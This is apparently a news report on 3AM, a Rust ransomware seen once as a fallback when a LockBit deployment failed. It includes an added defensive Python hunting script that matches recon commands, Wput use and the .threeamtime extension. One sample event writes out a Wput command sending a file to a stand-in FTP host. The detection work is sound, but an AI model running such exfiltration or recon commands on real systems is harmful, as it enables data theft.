A new ransomware family called 3AM emerges in the threat world
September 13, 2023
3AM is a new type of ransomware discovered in a single incident in which attackers failed to deploy LockBit ransomware to targeted infrastructure.
Symantec’s Threat Hunter team has discovered a new ransomware family calling itself 3AM. This ransomware family has so far only been deployed in one incident, in which the attackers failed to deploy LockBit ransomware.
The attackers were able to successfully deploy the ransomware to three computers on the target organization’s network, but it was blocked on two of those three computers.
3AM is a new ransomware written in Rust. Before starting the encryption process, the ransomware attempts to stop several services. Once files have been encrypted, it attempts to delete Volume Shadow (VSS) copies. The malware appends the extension .threeamtime to the filenames of encrypted files. Researchers have not yet determined whether the attackers behind 3AM are affiliated with known cybercrime groups.
The attacker was observed using the post-exploitation tool Cobalt Strike and attempted to run reconnaissance commands (whoami, netstat, quser, net share) for lateral movement. The exact entry route used in the attack is unknown.
The attacker attempted to maintain persistence by adding new users and used the Wput tool to exfiltrate files to their own FTP server.
This ransomware is a 64-bit executable file that supports multiple commands to stop applications running backup and security software.
This malware only encrypts files that match predefined criteria.
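The behaviours described above (the burst of reconnaissance commands, Wput execution and the .threeamtime extension) can be turned into a simple host-level hunt. The following Python sketch is an added example, not code from Symantec or the original article; the event layout, the 10-minute window, the threshold of three distinct commands and all sample events are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Indicators named in the article; thresholds and event layout are assumptions.
RECON = ("whoami", "netstat", "quser", "net share")
EXFIL_TOOL, ENCRYPTED_EXT = "wput", ".threeamtime"
WINDOW = timedelta(minutes=10)  # assumed burst window
MIN_RECON = 3                   # assumed count of distinct recon commands

# Constructed sample events, not real telemetry: (timestamp, host, kind, value)
SAMPLE_EVENTS = [
    ("2023-09-01T02:58:10", "ws-01", "proc", r"C:\Windows\System32\whoami.exe"),
    ("2023-09-01T02:58:40", "ws-01", "proc", "netstat -ano"),
    ("2023-09-01T02:59:05", "ws-01", "proc", "quser"),
    ("2023-09-01T03:20:00", "ws-01", "proc", "wput.exe data.zip ftp://ftp.example.invalid/"),
    ("2023-09-01T03:41:00", "ws-01", "file", r"C:\Users\a\report.docx.threeamtime"),
    ("2023-09-01T09:00:00", "ws-02", "proc", "whoami"),
    ("2023-09-01T13:00:00", "ws-02", "proc", "net share"),
    ("2023-09-01T03:42:00", "ws-03", "file", r"D:\share\budget.xlsx.threeamtime"),
]

def normalize(cmdline):
    """Lower-case a command line and strip the path and .exe from its image name."""
    parts = cmdline.lower().split() or [""]
    image = parts[0].rsplit("\\", 1)[-1]
    parts[0] = image[:-4] if image.endswith(".exe") else image
    return " ".join(parts)

def recon_key(cmd):
    """Return the recon command a normalized command line starts with, else None."""
    return next((r for r in RECON if cmd == r or cmd.startswith(r + " ")), None)

def detect(events):
    """Return {host: sorted findings} for hosts showing any behaviour above."""
    findings, seen = {}, {}
    for ts, host, kind, value in sorted(events):
        when, hits = datetime.fromisoformat(ts), findings.setdefault(host, set())
        if kind == "file" and value.lower().endswith(ENCRYPTED_EXT):
            hits.add("encrypted-extension")
        elif kind == "proc":
            cmd = normalize(value)
            if cmd.split(" ")[0] == EXFIL_TOOL:
                hits.add("wput-execution")
            key = recon_key(cmd)
            if key:
                last = seen.setdefault(host, {})
                last[key] = when  # remember the latest time each command ran
                if sum(when - t <= WINDOW for t in last.values()) >= MIN_RECON:
                    hits.add("recon-burst")
    return {h: sorted(f) for h, f in findings.items() if f}
```

Calling `detect(SAMPLE_EVENTS)` flags ws-01 for all three behaviours and ws-03 for the extension only, while ws-02, where two recon commands ran hours apart, is not flagged.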
The 3AM operators use a Tor “support” portal to negotiate ransom demands with victims.
“Ransomware companies are becoming increasingly independent from ransomware operators; this is not the first time Symantec has observed attackers attempting to deploy two types of ransomware in one blow,” concludes the report. “New ransomware families emerge frequently, but most die out quickly or fail to gain much attention. However, the fact that 3AM was used as a fallback by LockBit affiliates suggests that it may be of interest to attackers and may be seen again in the future.”